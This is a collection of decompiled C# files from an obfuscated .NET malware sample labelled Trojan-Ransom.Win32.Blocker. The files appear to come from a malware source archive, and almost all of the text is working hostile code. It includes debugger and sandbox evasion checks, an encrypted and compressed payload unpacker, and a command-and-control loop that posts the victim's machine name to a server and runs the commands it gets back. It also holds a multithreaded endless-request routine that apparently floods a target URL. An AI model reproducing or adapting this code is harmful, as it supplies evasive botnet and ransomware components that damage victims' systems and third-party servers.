internal static extern int cbb7fbb3e253592177be35000370dc20a(
IntPtr c3ffd86e445fc1629a21a22d8b6f86a4b,
StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490,
int c668f9f3a61afe17d1174701f81735e18);
internal static string c8859338e5a3695a878c4bf6705d5751e(
IntPtr c5de7cfd6591e65c25b36e0738fcc29da)
{
StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490 = new StringBuilder(260);
c6483995e04301d945fdc8bbbeb2fdfcb.cbb7fbb3e253592177be35000370dc20a(c5de7cfd6591e65c25b36e0738fcc29da, cb9c6716f9fec7a6b7c9e19bedc9f2490, cb9c6716f9fec7a6b7c9e19bedc9f2490.Capacity);
return cb9c6716f9fec7a6b7c9e19bedc9f2490.ToString();
}
internal static void cface76737f299c15f46aea51d2f361b6()
{
if (c6483995e04301d945fdc8bbbeb2fdfcb.ca73ad72d5e801fc691a6bdacf00b1e12())
throw new Exception(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2196));
}
internal static bool ca73ad72d5e801fc691a6bdacf00b1e12()
{
try
{
if (Debugger.IsAttached)
return true;
IntPtr c6b70c3224512397ad0c3a2798d87e490 = c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2352));
c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c9d3e290b2a38dccd6dec3b8cbf70f0c7 = c6483995e04301d945fdc8bbbeb2fdfcb.c4d8130fdf16941c5a049e8c5637a73b3(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2377));
if (c9d3e290b2a38dccd6dec3b8cbf70f0c7 != null && c9d3e290b2a38dccd6dec3b8cbf70f0c7() != 0)
return true;
IntPtr num1 = c6483995e04301d945fdc8bbbeb2fdfcb.ccfa0dd8bc046c30e43dcac27b0790853(1024U, 0, c6483995e04301d945fdc8bbbeb2fdfcb.c30c15026493b976c2325f72361ac915c());
if (num1 != IntPtr.Zero)
{
try
{
c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cb52fb1903297a0d67737ce529c917679 = c6483995e04301d945fdc8bbbeb2fdfcb.cdf87155547dda952c916d9b76727151f(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2412));
if (cb52fb1903297a0d67737ce529c917679 != null)
{
int pbDebuggerPresent = 0;
if (cb52fb1903297a0d67737ce529c917679(num1, ref pbDebuggerPresent) != 0)
{
if (pbDebuggerPresent != 0)
return true;
}
}
}
finally
{
c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(num1);
}
}
bool flag = false;
try
{
c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(new IntPtr(305419896));
}
catch
{
flag = true;
}
if (flag)
return true;
try
{
c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c92e35801b4eaae7ab7d70e17c0173e9c = c6483995e04301d945fdc8bbbeb2fdfcb.c7dda1f225a33dfcf98fae6f7e3f67461(c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2465)), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2486));
if (c92e35801b4eaae7ab7d70e17c0173e9c != null)
{
c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = false;
int num2 = c92e35801b4eaae7ab7d70e17c0173e9c(new c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737(c6483995e04301d945fdc8bbbeb2fdfcb.c084af11cdc465888c3ed538fb3591a27), IntPtr.Zero);
if (c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522)
return true;
}
}
catch
{
}
}
catch
{
}
return false;
}
[StructLayout(LayoutKind.Sequential)]
internal class c35ad2d2b7d5d5e5e9092a2e2f7ca2384
{
internal IntPtr c7ba91d8fad77443c443bf7d678c49ce5;
internal IntPtr cbd073e7d3c73e14c44cb6a8c7608c269;
internal IntPtr ce57239c4110302077b325d4f0ddc2a7e;
internal IntPtr cbe6898bbda725d30c0f429c4e8b0262e;
internal IntPtr c4517ace766e7dab5ea383c670cb1d2eb;
internal IntPtr c6609b7e1d07cfe2dc208c6746a4a790d;
}
internal delegate int c808000474b78cc57ff5e0ac36b3fcc73(
IntPtr ProcessHandle,
int ProcessInformationClass,
c6483995e04301d945fdc8bbbeb2fdfcb.c35ad2d2b7d5d5e5e9092a2e2f7ca2384 ProcessInformation,
uint ProcessInformationLength,
out uint ReturnLength);
internal delegate int cc055647fecedcfcae1eaf4bbad26d609(
IntPtr ProcessHandle,
int ProcessInformationClass,
out uint debugPort,
uint ProcessInformationLength,
out uint ReturnLength);
internal delegate int c9d3e290b2a38dccd6dec3b8cbf70f0c7();
internal delegate void c8b9df66c099e027db7fe27eeb5d97544([MarshalAs(UnmanagedType.LPStr)] string lpOutputString);
internal delegate int cb52fb1903297a0d67737ce529c917679(
IntPtr hProcess,
ref int pbDebuggerPresent);
internal delegate int cc2644b96756a32d21ac3b9be2d8f2737(IntPtr wnd, IntPtr lParam);
internal delegate int c92e35801b4eaae7ab7d70e17c0173e9c(
c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737 lpEnumFunc,
IntPtr lParam);
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c6c454dac7269c067c2acbc6d3596af91.cs
+184
View File
@@ -0,0 +1,184 @@
// Decompiled with JetBrains decompiler
// Type: A.c6c454dac7269c067c2acbc6d3596af91
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Diagnostics;
using System.Threading;
namespace A
{
internal class c6c454dac7269c067c2acbc6d3596af91
{
public bool cf207f3ae43b7e20165972765acd61caf()
{
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cee85921584204e889e611a07cd58ecbe)
{
try
{
if (Debugger.IsAttached)
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c2792dd7fd2c0d285a78c0e499a018122)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c9a92257b6e60ece44ea61306d2e6b428)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c42ca1abba7c3eb2e77675d1b04109855)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(16)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c30a3cccc21356bfeddb6e1403a422049)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(31)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cc4e05926d74457f5cadf3b3016466128)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(46)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c7f5f1982284129a8f8b31dccfdfd611d)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(59)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c16ce46a32b47b87a25752f953db57737)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(68)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c95571c46a38d4a535991b6bdfeb2551e)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(81)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cbccd1ae7ab19514f4d7ff49c6066ef54)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(96)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c425aa3d25ab0dba5645b56912ea4c4d2)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.ca6a4dd6f6e974a349cf2f38f0541f742() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(115))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c866ddb199211ac10f9ce85f741267ca5)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.ca6a4dd6f6e974a349cf2f38f0541f742() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(162))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf18b158d9e992664f5c41c68fd861625)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.ca6a4dd6f6e974a349cf2f38f0541f742() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(191))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cee81352979639fa55df6e014bfaad5e8)
{
try
{
string[] strArray = new string[2]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(246),
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(297)
};
foreach (string str in strArray)
{
if (c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.ca6a4dd6f6e974a349cf2f38f0541f742() == str)
return false;
}
}
catch
{
}
}
return true;
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c723bfb08ed492f620d3f103aea9340c0.cs
+71
View File
@@ -0,0 +1,71 @@
// Decompiled with JetBrains decompiler
// Type: A.c723bfb08ed492f620d3f103aea9340c0
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Security.Cryptography;
namespace A
{
internal class c723bfb08ed492f620d3f103aea9340c0
{
internal static byte[] c62aa9377688ed67bcfc8a790818c7647(
Stream c46bc97527d5b5ecfa7a6ae35f370bef0)
{
byte num1 = (byte) c46bc97527d5b5ecfa7a6ae35f370bef0.ReadByte();
byte[] numArray = new byte[c46bc97527d5b5ecfa7a6ae35f370bef0.Length - 1L];
c46bc97527d5b5ecfa7a6ae35f370bef0.Read(numArray, 0, numArray.Length);
if (((int) num1 & 1) != 0)
{
DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
byte[] dst1 = new byte[8];
Buffer.BlockCopy((Array) numArray, 0, (Array) dst1, 0, 8);
cryptoServiceProvider.IV = dst1;
byte[] dst2 = new byte[8];
Buffer.BlockCopy((Array) numArray, 8, (Array) dst2, 0, 8);
bool flag = true;
foreach (byte num2 in dst2)
{
if (num2 != (byte) 0)
{
flag = false;
break;
}
}
if (flag)
dst2 = Assembly.GetExecutingAssembly().GetName().GetPublicKeyToken();
cryptoServiceProvider.Key = dst2;
numArray = cryptoServiceProvider.CreateDecryptor().TransformFinalBlock(numArray, 16, numArray.Length - 16);
}
if (((int) num1 & 2) != 0)
{
try
{
MemoryStream memoryStream1 = new MemoryStream(numArray);
DeflateStream deflateStream = new DeflateStream((Stream) memoryStream1, CompressionMode.Decompress);
MemoryStream memoryStream2 = new MemoryStream((int) memoryStream1.Length * 2);
int count1 = 1000;
byte[] buffer = new byte[count1];
int count2;
do
{
count2 = deflateStream.Read(buffer, 0, count1);
if (count2 > 0)
memoryStream2.Write(buffer, 0, count2);
}
while (count2 >= count1);
numArray = memoryStream2.ToArray();
}
catch (Exception ex)
{
}
}
return numArray;
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c7bada025401008fe87db7163fb8faf48.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: A.c7bada025401008fe87db7163fb8faf48
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System.Collections.Generic;
using System.Runtime.CompilerServices;
namespace A
{
[CompilerGenerated]
internal class c7bada025401008fe87db7163fb8faf48
{
internal static Dictionary<string, int> c139b1fcd81f6e8b23501dbbfe6bf01fc;
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c986963ced362383f6d7b6341e31dcfe7.cs
+70
View File
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: A.c986963ced362383f6d7b6341e31dcfe7
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System.Net;
using System.Threading;
namespace A
{
internal class c986963ced362383f6d7b6341e31dcfe7
{
private static ThreadStart[] c1aa5e7f9240b5cc21ac78813ddfbaa39;
private static Thread[] c12e108ff6c83dbee08305cc2b0ce9998;
public static string c966ab90271ad8729ab4aa4181c310abf;
private static c986963ced362383f6d7b6341e31dcfe7.c962b5c4db4e1b689718a0cfaf3910ed2[] cf0e6693c86d44a037b66e8b181b3d176;
public static int c1e5fb6eadf8fa36fbb78b515080241e1;
public static void cef8e53905308fbf449ffc06b3aecf429()
{
c986963ced362383f6d7b6341e31dcfe7.c12e108ff6c83dbee08305cc2b0ce9998 = new Thread[c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1];
c986963ced362383f6d7b6341e31dcfe7.c1aa5e7f9240b5cc21ac78813ddfbaa39 = new ThreadStart[c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1];
c986963ced362383f6d7b6341e31dcfe7.cf0e6693c86d44a037b66e8b181b3d176 = new c986963ced362383f6d7b6341e31dcfe7.c962b5c4db4e1b689718a0cfaf3910ed2[c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1];
for (int index = 0; index < c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
c986963ced362383f6d7b6341e31dcfe7.cf0e6693c86d44a037b66e8b181b3d176[index] = new c986963ced362383f6d7b6341e31dcfe7.c962b5c4db4e1b689718a0cfaf3910ed2(c986963ced362383f6d7b6341e31dcfe7.c966ab90271ad8729ab4aa4181c310abf);
c986963ced362383f6d7b6341e31dcfe7.c1aa5e7f9240b5cc21ac78813ddfbaa39[index] = new ThreadStart(c986963ced362383f6d7b6341e31dcfe7.cf0e6693c86d44a037b66e8b181b3d176[index].c254d67f0f5a5ab80dbe5de1d1b27a54e);
c986963ced362383f6d7b6341e31dcfe7.c12e108ff6c83dbee08305cc2b0ce9998[index] = new Thread(c986963ced362383f6d7b6341e31dcfe7.c1aa5e7f9240b5cc21ac78813ddfbaa39[index]);
c986963ced362383f6d7b6341e31dcfe7.c12e108ff6c83dbee08305cc2b0ce9998[index].Start();
}
}
public static void c451004db98e7b627d5ee87fe743cb383()
{
for (int index = 0; index < c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
try
{
c986963ced362383f6d7b6341e31dcfe7.c12e108ff6c83dbee08305cc2b0ce9998[index].Suspend();
}
catch
{
}
}
}
private class c962b5c4db4e1b689718a0cfaf3910ed2
{
private string c966ab90271ad8729ab4aa4181c310abf;
private WebClient ccf88997dcba72d8bd4fdfcc99be9653e = new WebClient();
public c962b5c4db4e1b689718a0cfaf3910ed2(string cc083dc90fba0d59dca2c0e63ef8c500c) => this.c966ab90271ad8729ab4aa4181c310abf = cc083dc90fba0d59dca2c0e63ef8c500c;
public void c254d67f0f5a5ab80dbe5de1d1b27a54e()
{
while (true)
{
try
{
this.ccf88997dcba72d8bd4fdfcc99be9653e.DownloadString(this.c966ab90271ad8729ab4aa4181c310abf);
}
catch
{
}
}
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c9988649815b3bee89b89ce1f70add59a.cs
+55
View File
@@ -0,0 +1,55 @@
// Decompiled with JetBrains decompiler
// Type: A.c9988649815b3bee89b89ce1f70add59a
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
namespace A
{
internal class c9988649815b3bee89b89ce1f70add59a
{
public bool c3bb3892b091698f44f5eef2d60b4fdce;
public bool c7f5f1982284129a8f8b31dccfdfd611d = true;
public bool cee85921584204e889e611a07cd58ecbe;
public bool c2792dd7fd2c0d285a78c0e499a018122 = true;
public bool c42ca1abba7c3eb2e77675d1b04109855 = true;
public bool c9a92257b6e60ece44ea61306d2e6b428 = true;
public bool c16ce46a32b47b87a25752f953db57737 = true;
public bool c425aa3d25ab0dba5645b56912ea4c4d2 = true;
public bool c30a3cccc21356bfeddb6e1403a422049 = true;
public bool cc4e05926d74457f5cadf3b3016466128 = true;
public bool c95571c46a38d4a535991b6bdfeb2551e = true;
public bool cf18b158d9e992664f5c41c68fd861625 = true;
public bool cee81352979639fa55df6e014bfaad5e8 = true;
public bool c866ddb199211ac10f9ce85f741267ca5 = true;
public bool cbccd1ae7ab19514f4d7ff49c6066ef54 = true;
public string[] c32d06ec84131a62668e3e18e23c950ae = new string[2]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(518),
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(541)
};
public string[] cce2f2518258cebbe2cbf0e7534398ba2 = new string[2]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(564),
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(605)
};
public string ce6b1c08295456824d707adffcd771c22 = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(656);
public string cdd86f79582ee69b3331f0a01a8458c64 = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(725);
public string c053a2ccab85d88a8bb0dd1fb41fedf35 = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(732);
public string cf878f08181d5af12c924fb92b523534b = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(769);
public int cddb71d8bcf007ee24cca0a5fc8c9f9d1 = 1;
public bool ca20a8f4602f269ed2947b3a5ca5860a2 = true;
public string c5c0d142f43b2ed4000991109cbc0575f = string.Empty;
public string c08c5101a594b5e3a22d4e523b7baa2b1 = Environment.MachineName;
public string c8d4d9680af49d6d5dcc86b05695287f2 = string.Empty;
public string[] c712648a24a265f1e1bc00c1dfbecbd3e = new string[2];
public c9988649815b3bee89b89ce1f70add59a()
{
this.c712648a24a265f1e1bc00c1dfbecbd3e[0] = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + this.c32d06ec84131a62668e3e18e23c950ae[0];
this.c712648a24a265f1e1bc00c1dfbecbd3e[1] = Environment.GetFolderPath(Environment.SpecialFolder.System) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + this.c32d06ec84131a62668e3e18e23c950ae[1];
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c9b81b1a3e4ee51d08f5de2448e459036.cs
+282
View File
@@ -0,0 +1,282 @@
// Decompiled with JetBrains decompiler
// Type: A.c9b81b1a3e4ee51d08f5de2448e459036
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;
using System.Threading;
namespace A
{
internal class c9b81b1a3e4ee51d08f5de2448e459036
{
private string c749d615fce46a65e549ecd0269efb309 = string.Empty;
public void ccca4f7e07f327977d582f4cecb7af4cd()
{
this.c70c0917b5d671ac9ae9d4e7f861b66d0();
new Thread(new ThreadStart(this.ca33aa6acdace65e5414a966dd1dc03ae)).Start();
}
private void c70c0917b5d671ac9ae9d4e7f861b66d0()
{
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1377) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1402) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cdd86f79582ee69b3331f0a01a8458c64 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1419) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c08c5101a594b5e3a22d4e523b7baa2b1 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1436) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c8d4d9680af49d6d5dcc86b05695287f2;
while (true)
{
try
{
string str = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
if (str.Length > 0)
{
if (str == c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b)
break;
Environment.Exit(-1);
}
}
catch
{
}
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
}
}
private void ca33aa6acdace65e5414a966dd1dc03ae()
{
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1453) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f;
while (true)
{
try
{
string ce500fea65ca5a93a477a5ab3b4c7f34d = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
if (ce500fea65ca5a93a477a5ab3b4c7f34d.Length > 0)
{
if (ce500fea65ca5a93a477a5ab3b4c7f34d != this.c749d615fce46a65e549ecd0269efb309)
{
this.c92d05caa41a6d8d9718da94fb32596c8(ce500fea65ca5a93a477a5ab3b4c7f34d);
this.c749d615fce46a65e549ecd0269efb309 = ce500fea65ca5a93a477a5ab3b4c7f34d;
}
}
else
{
try
{
c2b32128b27710d76674c1117f7f19ccf.c90f6d098ad5ce70814005fb0adf72870();
}
catch
{
}
try
{
c986963ced362383f6d7b6341e31dcfe7.c451004db98e7b627d5ee87fe743cb383();
}
catch
{
}
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.c4f970d2f71876e66d1daba6a51237e62();
}
catch
{
}
try
{
cb7379333abfa1ab1cb35304f3a8573ec.cc3c1bbd84093cbd7bdc83bcc5fb3ac15();
}
catch
{
}
this.c749d615fce46a65e549ecd0269efb309 = string.Empty;
}
}
catch
{
}
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
}
}
private string c372676659fe6f48f27b1ad11ccb40951(
string cf7d7ab02f04f36e1e7781d49924e7769,
string c2cbf7d2e1f35e8102d156c340d5f99cb)
{
ServicePointManager.Expect100Continue = false;
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(cf7d7ab02f04f36e1e7781d49924e7769);
httpWebRequest.ContentType = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1478);
httpWebRequest.Method = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1545);
httpWebRequest.UserAgent = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b;
byte[] bytes = Encoding.ASCII.GetBytes(c2cbf7d2e1f35e8102d156c340d5f99cb);
httpWebRequest.ContentLength = (long) bytes.Length;
Stream requestStream = httpWebRequest.GetRequestStream();
requestStream.Write(bytes, 0, bytes.Length);
requestStream.Close();
WebResponse response = httpWebRequest.GetResponse();
return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim();
}
private void c92d05caa41a6d8d9718da94fb32596c8(string ce500fea65ca5a93a477a5ab3b4c7f34d)
{
string[] strArray = new string[0];
try
{
strArray = ce500fea65ca5a93a477a5ab3b4c7f34d.Split('*');
}
catch
{
}
string key;
if ((key = strArray[0]) == null)
return;
// ISSUE: reference to a compiler-generated field
if (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc == null)
{
// ISSUE: reference to a compiler-generated field
c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc = new Dictionary<string, int>(8)
{
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1554),
0
},
{
